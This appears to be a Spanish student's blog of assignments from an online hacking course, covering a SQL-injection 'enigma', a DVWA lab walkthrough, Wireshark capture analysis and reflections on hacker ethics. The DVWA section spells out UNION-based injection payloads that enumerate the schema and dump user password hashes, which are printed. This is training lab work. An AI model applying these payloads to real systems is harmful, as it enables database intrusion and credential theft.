VALORACIÓN PERSONAL:



Teniendo en cuenta el poco conocimiento sobre hacking o sobre los conocimientos de linux en si para hackear servidores considero que este curso a aportado grandes conocimientos a mi persona desde como obtener información básica de una pc a través de una dirección ip o realizar Sql Inyección del cual había escuchado mucho pero no sabia una forma técnica de como se lo realiza.

Ademas este curso a resultado muy bueno ya que ayudado a interesarme por la mayoría de la información o programas expuestos a través de la plataforma hasta el punto de no quedarme únicamente con ese conocimiento si no de realizar una instigación mas profunda  para obtener mayor información de los mismos.

La forma de trabajar del MOOC es muy interesante ya que se puede obtener ayuda fácilmente con compañeros que tengan mayor experiencia en el tema mediante los foros o grupos en las redes sociales, con lo cual ayuda al aprendizaje de una manera rápida.

En conclusión estoy muy contento de haber podido realizar este curso ya que a aportado grandes conocimientos a mi persona sobre temas que desconocido o tenia poca información de ellos.

Enigma

Pasos para resolver el enigma:




El primer paso es entrar al servidor que nos fue proporcionado http://pruebas.euskalert.net/ y nos dirigimos a la pestaña de sql Injection una vez bajado el nivel de seguridad.


El segundo paso es obtener la contraseña con la cual esta cifrado el archivo para eso se nos facilito previamente una información adicional la cual es el nombre de la tabla donde se encuentra dicha contraseña. Para obtener la información desea introducimos el siguiente comando:

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' #




Como podemos observar la contraseña es : "use the force".


Como ultimo paso tenemos que cifrar el archivo descargado, para lo cual utilizaremos el programa Kleopatra. Donde nos solicitara la contraseña ya obtenida.


Y así resolví el enigma y me pude unir al respectivo grupo.

Unidad 2 -Tarea 4

ACTIVIDAD DE REFLEXIÓN

Después de realizar tanto la unidad 1 y unidad 2 del curso puedo concluir que con las herramientas adecuadas  es posible obtener distinta información útil con tan solo atacando a una red o base de datos.

Con esto no seria nada difícil conocer las vulnerabilidades de distintos sistemas tanto para atacarlo o hacerlo mas seguro.

El uso de esta información depende de cada persono de su ética profesional, si deciden  utilizarla para el bien de la sociedad, del mundo o únicamente utilizarla para fines lucrativos.

Unidad 2 -Tarea 3

HACKING TEAM

¿Qué opinas sobre la acción realizada contra Hacking Team? 
¿Consideras que los hackers se han excedido en sus ‘funciones’?

Las acciones realizada hacia Hacking Team fue acciones justificada ya que se sospechaba que la empresa estaba vendiendo información a diversos países de una serie de espionajes realizada por la empresa. Por lo cual considero que fue una acción justificadas pero lo hackers excedieron en sus funciones ya que publicaron hasta partes sensibles de los códigos de vigilancia que utilizaba la empresa.

¿Cuáles crees que deberían ser los límites del hacker?

A mi perspectiva las limitaciones  de un hachers deberían ser ilimitados siempre y cuando sus acciones se realicen bajo un código ético y con responsabilidad, en ayuda de la sociedad y la justicia en general. 


¿Piensas que la ciudadanía es consciente del rol que los hackers pueden jugar en favor de su propia seguridad en la red detectando aquellos sitios que no son seguros ya sea porque ponen en riesgo los datos de los usuarios o bien porque hacen un uso ilegítimos de los mismos?

Pienso que en la actualidad existe un porcentaje ínfimo de la población que es consiente del papel que juega un hackers en la seguridad. La mayoría de la población es ignorante sobre las labores que realiza un hacher, y el poco conocimiento que tienen de este lo relacionan con películas o series donde no se tienen una perspectiva clara de los mismo.  

Unidad 2. Tarea 2

TAREA 2: SQL injection
Una vez descargada la maquina virtual e importada a virtualBox procedemos a ingresar mediante la ip dada por dhcp.
Entramos mediante el navegador web accede a la dirección http://192.168.56.101/login.php
A continuación mediante el usuario admin y la clave password acedemos a la web que se muestra.
Una ves ingresado lo siguiente es cambiar el nivel de seguridad a baja.
Seleccionamos la opción de SQL Inyeccon y procedemos a hacer las respectivas practicas:
Enviamos como user id "1" con lo cual nos devolvera el ID, nombre, apellido del respectivo usuario en este caso el el "1".
El siguiente paso es mostrar todos los registros que son falsos y verdaderos, con el siguiente comando %' or '0'='0
Lo siguiente es la visualización de la versión de la base de datos y lo realizamos con el siguiente comando: %' or 0=0 union select null, version() #
Como podemos notar en la parte inferior nos indica la version de la base de datos: 5.5.44-0+deb8u1


El siguiente paso es obtener el usuario de la base de datos y lo realizamos con el siguiente comando: %' or 0=0 union select null, user() #
Nos muestra en la parte inferior el el apellido: dvwa@localhost


Lo siguiente es conocer el nombre de la base de datos lo cual se lo realiza con el siguiente comando: %' or 0=0 union select null, database() #
El nombre de la base de datos es: dvwa


Lo siguiente es todas las tablas de INFORMATION_SCHEMA lo cual se lo realiza con el siguiente comando: %' and 1=0 union select null, table_name from information_schema.tables #


Mostrar todas las columnas de campo contenidos en la tabla de usuario INFORMATION_SCHEMA con el siguiente comando : %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Por ultimo leemos la tabla password para obtener las claves y usuarios.
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #




Y asi optenemos los datos de los usuarios de la base de datos:

admin :5f4dcc3b5aa765d61d8327deb882cf99
gordonb :e99a18c428cb38d5f260853678922e03

1337 :8d3533d75ae2c3966d7e0d4fcc69216b

pablo :0d107d09f5bbe40cade3de5c71e9e9b7

smithy :5f4dcc3b5aa765d61d8327deb882cf99




Unidad 2 - Tarea 1

Capturando tráfico con Wireshark

Descargamos las trazas de Wireshark respectivas procedemos al análisis de los paquetes con un filtro telnet.

Preguntas Telnet:

  • ¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
    User: fake
      Password: user
  • ¿Qué sistema operativo corre en la máquina?
    Sistema Operativo: OpenBSD 2.6-beta
  • ¿Qué comandos se ejecutan en esta sesión?
      $ls
      $ls  --a      
      $/sbin/ping www.yahoo.com
      $exit



Analizando SSL


  • ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
 Los certificados se envían en el paquete que contienen la palabra Certificate. En este caso en el segundo      paquete.

  • ¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
 El certificado va en claro y lo proporciona  Verisign.com
  • ¿Qué asegura el certificado, la identidad del servidor o del cliente?
 Servidor


Analizando SSH.

    • ¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?
    •            El cifrado empieza en el paquete 13.
    • ¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
              Protocolo ssh.
    • ¿Es posible ver alguna información de usuario como contraseñas de acceso?
               No es posible ya que toda la información esta cifrada.

    Unidad 1 - Tarea 2

    ¿ Quieren saber por qué los escogí ?
    Simple, tómense 5 minutos en revisar los links 

    http://www.hackplayers.com/

    https://www.hackthissite.org/

    http://foro.elhacker.net/